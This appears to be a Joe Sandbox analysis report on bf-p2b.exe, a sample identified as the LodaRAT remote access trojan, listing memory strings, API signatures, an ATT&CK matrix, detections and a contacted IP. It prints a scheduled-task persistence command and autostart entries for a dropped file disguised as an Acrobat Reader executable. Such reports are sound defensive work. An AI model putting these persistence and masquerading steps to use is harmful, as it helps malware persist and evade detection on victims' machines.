                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cscript.exememstr_0272e603-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x x @d@d@d$dmemstr_05109427-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: conhost.exememstr_4cecc582-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: conhost.exepmemstr_7d2b4bb1-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %u]$memstr_7b5a6eec-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,0hjomemstr_191eb3f3-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: backgroundtaskhost.exememstr_5e735f23-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "(8oomemstr_07f7f4fc-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .p,p,p,memstr_01fb908c-b
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hgbw0memstr_9d604289-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "(ptomemstr_8cdcbfe9-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runtimebroker.exehmemstr_b011bd10-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: upfc.exememstr_b704365f-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h%h% memstr_bf79a658-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exememstr_24938337-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pg`g8memstr_44e052c7-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `gpg8memstr_e3c309ec-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @g0g8memstr_4366b86c-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pg@g8memstr_259e9323-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0g g8memstr_a83af6ac-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bh8)pmemstr_64345ce6-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bh04pmemstr_bee99511-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bh(?pmemstr_6ec7ab04-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bhxfpmemstr_257f30ae-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bh jpmemstr_764142d0-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bhpqpmemstr_84bfffe9-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bhh\pmemstr_fa8880fa-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bh`gpmemstr_9206cfee-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bhxrpmemstr_cd3b0856-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bhp}pmemstr_f1da9bd2-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9]?l;memstr_2cb85dde-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllhost.exehmemstr_ca9f8fbb-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bf-p2b.exememstr_8820e5a2-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d555kmemstr_42afc43c-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.exememstr_0c38454a-6
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !this program cannot be run in dos mode.memstr_d41000f1-e
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hupx0memstr_31836bd9-a
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: upx1pmemstr_94b8e3c8-e
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrcmemstr_95c1bde9-5
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 3.07upx!memstr_7e56b5e5-1
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 7upw_memstr_43cd58c7-5
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 6)xhmemstr_89cb4a38-c
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: o[:=,qmemstr_be4448c6-d
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: c5,-h;memstr_2ac59667-0
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oplwj@memstr_48150392-1
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: a@pc00memstr_562cbeb4-f
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: f4k/dr\mmemstr_e7a4f35f-1
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (pbu&memstr_0970bced-f
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: :jf<qmemstr_c51a31cc-1
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: llptjmemstr_ab9b5c58-d
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: r|$t8humemstr_c56ebb04-e
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 3 '(4(memstr_aa3c0f79-9
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ~8'p}memstr_3bbdcbec-7
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0 memstr_95df8e39-6
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x*`dkmemstr_f297313c-0
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: systemmemstr_3afb54eb-d
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: registry(memstr_899a9817-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: smss.exehmemstr_ae4e96c5-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exe(memstr_eca68d52-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wininit.exememstr_b7246914-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #s0lmmemstr_69a4efef-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exememstr_a8af9b7f-5
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: winlogon.exememstr_3ce73428-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: z3zbymemstr_8c306ad5-f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: services.exememstr_fc8302fb-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: npqpqpqz,memstr_454f89c3-6
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: v3h[mmemstr_53f4db0f-f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lsass.exememstr_8b63b9b6-2
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exememstr_32da2766-7
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fontdrvhost.exememstr_679a10b4-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe(memstr_63d1be0a-8
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,p#p&p#fmemstr_81962f7d-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe memstr_6e6b4723-6
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dwm.exememstr_fae55d97-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: p, )pmemstr_82cfc1ee-7
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exehmemstr_f66efe43-c
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s4nrsmemstr_e002641e-4
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hh!svchost.exe(memstr_a9977917-d
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x"svchost.exe8memstr_cf1e312d-f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #memory compressionhmemstr_91d4f0e6-8
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $svchost.exememstr_ec97492e-c
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %svchost.exehmemstr_3a90fb13-f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &svchost.exememstr_a457a02f-4
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'svchost.exehmemstr_42beacff-6
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )svchost.exememstr_f7660d0a-a
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *svchost.exe(memstr_24f9ed8e-c
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +svchost.exehmemstr_f6df3a63-7
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,svchost.exememstr_af8a2e63-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .svchost.exememstr_c8491e52-8
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `4x+`memstr_f4afa748-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /svchost.exememstr_d079219d-b
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <(p6(memstr_059e3ec7-2
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0svchost.exememstr_3c21566f-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1svchost.exememstr_1307db6b-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2spoolsv.exe(memstr_81440583-d
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3svchost.exememstr_1b64b95c-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4svchost.exe(memstr_acb946ac-4
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5svchost.exe(memstr_3c3fa3aa-c
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3BE95 LogonUserW,0_2_00B3BE95
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B1F78E
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B0374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00B0374E
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B47DD5 mouse_event,0_2_00B47DD5
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B3B398
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B3BE31
                Source: bf-p2b.exe, Softwarefx-Acrobat-Reader.exeBinary or memory string: Shell_TrayWnd
                Source: bf-p2b.exe, 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Softwarefx-Acrobat-Reader.exe, 00000005.00000002.1710221010.0000000000F7E000.00000040.00000001.01000000.00000007.sdmp, Softwarefx-Acrobat-Reader.exe, 00000006.00000002.1740466666.0000000000F7E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\bf-p2b.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B27254 cpuid 0_2_00B27254
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B240DA GetSystemTimeAsFileTime,__aulldiv,0_2_00B240DA
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B32C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B32C3C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B1E47B
                Source: C:\Users\user\Desktop\bf-p2b.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected LodaRAT
                Source: Yara matchFile source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Yara detected LodaRat
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Source: Softwarefx-Acrobat-Reader.exe, 0000000F.00000002.2920431525.0000000000F7E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                Source: Softwarefx-Acrobat-Reader.exe, 0000000D.00000003.2323612784.0000000004919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                Source: Softwarefx-Acrobat-Reader.exe, 00000006.00000003.1729572012.0000000005216000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81Y/

                Remote Access Functionality

                barindex
                Yara detected LodaRAT
                Source: Yara matchFile source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Yara detected LodaRat
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B591DC
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B596E2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F291DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00F291DC
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F296E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00F296E2

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                2
                Valid Accounts                		11
                Windows Management Instrumentation                		2
                Valid Accounts                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		21
                Input Capture                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                System Shutdown/Reboot                		Acquire InfrastructureGather Victim Identity Information
                Default Accounts11
                Scripting                		1
                Scheduled Task/Job                		2
                Valid Accounts                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory2
                File and Directory Discovery                		Remote Desktop Protocol21
                Input Capture                		Exfiltration Over Bluetooth1
                Encrypted Channel                		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                Domain Accounts3
                Native API                		21
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		11
                Scripting                		Security Account Manager27
                System Information Discovery                		SMB/Windows Admin Shares12
                Clipboard Data                		Automated ExfiltrationSteganographyData Encrypted for ImpactDNS ServerEmail Addresses
                Local Accounts1
                Scheduled Task/Job                		Login Hook12
                Process Injection                		21
                Obfuscated Files or Information                		NTDS161
                Security Software Discovery                		Distributed Component Object ModelInput CaptureTraffic DuplicationProtocol ImpersonationData DestructionVirtual Private ServerEmployee Names
                Cloud AccountsLaunchdNetwork Logon Script1
                Scheduled Task/Job                		1
                Software Packing                		LSA Secrets2
                Virtualization/Sandbox Evasion                		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
                Replication Through Removable MediaScheduled TaskRC Scripts21
                Registry Run Keys / Startup Folder                		1
                Masquerading                		Cached Domain Credentials3
                Process Discovery                		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                External Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync11
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Virtualization/Sandbox Evasion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                Supply Chain CompromisePowerShellCronCron12
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                bf-p2b.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\JWPING.vbs100%AviraVBS/Runner.VPJI
                C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe49%ReversingLabsWin32.Trojan.Nymeria

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://ip-score.com/checkip/bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.111.138.100
                  		unknownUnited States
                  		3223VOXILITYGBtrue

                  General Information

                  Joe Sandbox Version:38.0.0 Ammolite
                  Analysis ID:1350639
                  Start date and time:2023-11-30 17:06:04 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 6s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:bf-p2b.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@15/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 88
                  • Number of non-executed functions: 281
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: bf-p2b.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  16:06:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JWPING "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                  16:06:57Task SchedulerRun new task: JWPING.exe path: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                  16:07:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JWPING "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                  16:07:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnk

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
